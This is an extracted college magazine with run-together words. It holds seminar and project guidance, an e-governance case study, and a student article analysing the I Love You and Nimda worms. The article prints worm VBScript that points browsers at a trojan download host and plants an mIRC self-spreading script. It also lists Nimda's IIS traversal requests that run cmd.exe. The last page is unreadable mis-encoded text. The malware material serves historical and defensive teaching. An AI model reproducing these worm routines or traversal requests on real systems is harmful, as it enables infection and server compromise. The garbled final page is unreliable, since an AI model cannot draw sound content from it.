orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

